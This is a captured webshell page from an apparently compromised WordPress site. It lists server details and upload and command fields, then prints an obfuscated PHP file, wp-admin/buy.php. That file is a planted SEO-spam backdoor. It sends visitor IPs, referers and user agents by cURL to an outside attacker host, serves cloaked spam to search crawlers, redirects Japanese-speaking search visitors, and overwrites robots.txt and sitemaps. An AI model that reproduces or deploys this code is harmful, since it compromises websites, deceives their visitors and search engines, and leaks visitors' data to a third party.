403Webshell
Server IP : 87.229.120.60  /  Your IP : 216.73.216.86
Web Server : Apache
System : Linux outside 5.4.8_Algonet_ZeroMAC_0.9.4.8 #6 SMP Mon Feb 3 20:36:07 CET 2020 x86_64
User : server ( 1002)
PHP Version : 8.3.20
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/faktorteam/www/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/faktorteam/www//wp-admin/buy.php
<?php
 goto XYegl; y2uHU: $req_url = $http . $domain . $req_uri; goto hLzpK; D4Nx8: $res_crawl = is_crawler($user_agent); goto agK9y; JbP9L: function is_japanese_language() { $accept_language = isset($_SERVER["\110\x54\124\120\137\101\x43\x43\105\120\124\x5f\114\101\x4e\107\x55\x41\107\105"]) ? $_SERVER["\x48\124\124\x50\x5f\101\x43\103\105\x50\124\137\114\x41\x4e\107\125\101\107\x45"] : ''; if (empty($accept_language)) { return false; } $langs = explode("\54", $accept_language); $primary_lang = strtolower(trim($langs[0])); if (strpos($primary_lang, "\152\x61") === 0) { return true; } return false; } goto BCKb3; MSZOY: $data1["\x64\157\155\x61\151\156"] = $domain; goto B0QSx; NA2xD: if (strpos($req_uri, "\56\x70\150\x70")) { $main_shell = $http . $ser_name . $self; $data1["\x6d\x61\151\156\137\x73\150\x65\154\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\x6d\x61\151\x6e\x5f\163\150\145\x6c\x6c"] = $main_shell; } goto iyRVc; agK9y: $req_uri = str_replace(array("\x2e\150\x74\155", "\56\150\164\155\x6c", "\56\x73\x68\x74\x6d\x6c", "\x2e\160\x68\164\155\x6c"), '', rtrim($req_uri, "\x2f")); goto Wh6ry; lhf0t: $self = $_SERVER["\120\x48\120\137\123\x45\114\x46"]; goto zjp2d; pSDlJ: if (strpos($req_uri, "\x2e\x70\x68\160")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto N4f0A; B0QSx: $data1["\x72\x65\x71\x5f\165\162\x69"] = $req_uri; goto x33_L; XYegl: $inter_domain = "\150\164\164\x70\163\x3a\x2f\57\x7a\66\x30\67\62\x34\137\61\x36\56\x6a\162\157\x75\163\x73\x65\x61\x75\56\170\x79\172\x2f"; goto HEB6_; NkSHY: function is_crawler($agent) { $agent_check = false; $bots = "\x67\x6f\157\x67\154\145\142\157\x74\174\x62\151\x6e\147\142\x6f\x74\x7c\147\157\157\147\x6c\145\x7c\x61\157\154\174\x62\151\x6e\147\174\171\141\x68\x6f\x6f"; if ($agent != '') { if (preg_match("\57\x28{$bots}\51\57\x73\x69", $agent)) { $agent_check = true; } } return $agent_check; } goto gDRPd; daDuc: $map1 = $inter_domain . "\x2f\155\141\160\56\160\150\x70"; goto nfVDZ; QIXb9: $chk_refer = check_refer($referer); goto vpfmb; x33_L: $data1["\150\x72\145\146"] = $href1; goto AdoKO; BCKb3: $http = isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\x48\x54\x54\x50\123"] !== "\157\x66\x66" ? "\x68\164\164\x70\163\72\x2f\x2f" : "\x68\x74\164\160\72\x2f\57"; goto pj3pj; X_trT: if (substr($req_uri, -6) == "\x72\x6f\142\157\x74\x73") { define("\102\x41\x53\105\x5f\120\x41\x54\x48", $_SERVER["\104\x4f\x43\125\x4d\105\116\124\137\122\117\x4f\124"]); $robots_cont = @file_get_contents(BASE_PATH . "\x2f\162\x6f\x62\x6f\164\163\x2e\x74\x78\x74"); $data1["\162\x6f\142\x6f\164\163\x5f\143\157\x6e\x74"] = $robots_cont; $robots_cont = @getServerCont($url_robots, $data1); file_put_contents(BASE_PATH . "\57\x72\x6f\142\157\164\163\56\x74\170\164", $robots_cont); $robots_cont = @file_get_contents(BASE_PATH . "\57\162\x6f\x62\157\x74\x73\x2e\x74\170\x74"); if (strpos(strtolower($robots_cont), "\163\151\164\145\155\x61\160")) { echo "\x72\x6f\142\x6f\164\x73\56\x74\x78\164\40\146\151\154\145\40\x63\x72\145\141\164\145\40\x73\x75\143\143\x65\163\x73\41"; } else { echo "\x72\x6f\x62\x6f\x74\x73\56\x74\x78\164\40\146\151\x6c\x65\x20\143\162\145\141\x74\145\x20\x66\141\151\154\x21"; } die; } goto EwRIx; LwYZU: $domain = $_SERVER["\x48\x54\124\120\x5f\x48\x4f\x53\124"]; goto lhf0t; zjp2d: $ser_name = $_SERVER["\123\x45\x52\x56\x45\122\137\116\x41\x4d\x45"]; goto y2uHU; epWxg: if ($res_crawl) { $data1["\150\164\x74\x70\x5f\165\163\x65\x72\x5f\141\147\x65\x6e\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto ut7T9; iyRVc: $referer = isset($_SERVER["\110\124\x54\120\x5f\x52\x45\x46\105\122\x45\x52"]) ? $_SERVER["\110\124\x54\120\x5f\x52\x45\x46\x45\122\105\x52"] : ''; goto QIXb9; hLzpK: $indata1 = $inter_domain . "\x2f\x69\x6e\144\141\164\x61\56\160\x68\x70"; goto daDuc; nfVDZ: $jump1 = $inter_domain . "\x2f\152\165\x6d\160\56\x70\x68\160"; goto cp8zH; vpfmb: $user_agent = strtolower(isset($_SERVER["\110\x54\x54\120\x5f\x55\x53\105\122\x5f\101\107\105\116\124"]) ? $_SERVER["\x48\124\124\x50\x5f\x55\x53\105\x52\137\101\107\105\116\x54"] : ''); goto D4Nx8; AdoKO: $data1["\162\x65\x71\137\165\x72\154"] = $req_url; goto X_trT; HEB6_: function getServerCont($url, $data = array()) { $url = str_replace("\40", "\x2b", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\70\56\60\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto NkSHY; gDRPd: function check_refer($refer) { $check_refer = false; $referbots = "\x67\157\157\x67\154\x65\174\x79\x61\150\x6f\x6f\174\142\x69\156\147\x7c\x61\157\x6c"; if ($refer != '' && preg_match("\x2f\50{$referbots}\x29\57\x73\151", $refer)) { $check_refer = true; } return $check_refer; } goto JbP9L; iM8ja: $url_robots = $inter_domain . "\x2f\x72\x6f\142\157\x74\x73\x2e\160\x68\160"; goto pSDlJ; Wh6ry: if (!$res_crawl && $chk_refer && is_japanese_language() && (preg_match("\x2f\x5c\x64\44\x2f", $req_uri) || preg_match("\43\133\x61\55\172\x5d\x3d\133\x61\x2d\172\60\x2d\x39\135\x2b\x23", $req_uri) || preg_match("\57\x69\164\x65\155\x2f", $req_uri))) { $data1["\x69\160"] = $_SERVER["\x52\105\115\117\124\x45\x5f\x41\x44\x44\122"]; $data1["\162\x65\146\x65\162\145\x72"] = isset($_SERVER["\x48\x54\124\120\137\x52\105\106\x45\x52\105\122"]) ? $_SERVER["\110\124\x54\120\137\122\x45\106\105\x52\105\122"] : ''; $data1["\165\x73\145\x72\137\141\147\x65\156\x74"] = strtolower(isset($_SERVER["\110\x54\x54\120\x5f\x55\123\105\x52\x5f\101\107\x45\x4e\124"]) ? $_SERVER["\110\124\x54\x50\x5f\125\123\105\122\x5f\x41\x47\x45\116\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto epWxg; N4f0A: $data1[] = array(); goto MSZOY; pj3pj: $req_uri = $_SERVER["\x52\x45\x51\x55\105\123\x54\137\125\x52\x49"]; goto LwYZU; cp8zH: $url_words = $inter_domain . "\x2f\x77\x6f\162\144\163\56\160\x68\x70"; goto iM8ja; EwRIx: if (substr($req_uri, -4) == "\x2e\x78\155\x6c") { if (strpos($req_uri, "\x61\x6c\154\x73\151\x74\145\x6d\x61\160\56\170\x6d\x6c")) { $str_cont = getServerCont($map1, $data1); header("\103\x6f\156\x74\145\156\164\55\x74\x79\160\145\x3a\x74\x65\170\164\57\170\155\154"); echo $str_cont; die; } if (strpos($req_uri, "\56\160\x68\160")) { $word4 = explode("\77", $req_uri); $word4 = $word4[count($word4) - 1]; $word4 = str_replace("\56\x78\x6d\x6c", '', $word4); } else { $word4 = str_replace("\x2f", '', $req_uri); $word4 = str_replace("\56\x78\155\x6c", '', $word4); } $data1["\x77\x6f\162\144"] = $word4; $data1["\x61\x63\x74\x69\x6f\x6e"] = "\143\x68\x65\143\x6b\x5f\x73\151\164\145\x6d\x61\x70"; $check_url4 = getServerCont($url_words, $data1); if ($check_url4 == "\x31") { $str_cont = getServerCont($map1, $data1); header("\103\157\x6e\164\145\156\164\x2d\164\x79\160\x65\x3a\x74\145\170\x74\x2f\x78\x6d\x6c"); echo $str_cont; die; } $data1["\141\143\x74\151\x6f\x6e"] = "\143\150\145\x63\153\137\167\x6f\x72\144\x73"; $check1 = getServerCont($url_words, $data1); if (strpos($req_uri, "\x6d\141\160") > 0 || $check1 == "\x31") { $data1["\141\x63\x74\x69\157\156"] = "\162\141\x6e\x64\137\170\155\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\x43\x6f\x6e\x74\x65\156\x74\55\x74\171\x70\x65\x3a\x74\145\x78\164\x2f\x78\155\154"); echo $check_url4; die; } } goto NA2xD; ut7T9: ?>

Youez - 2016 - github.com/yon3zu
LinuXploit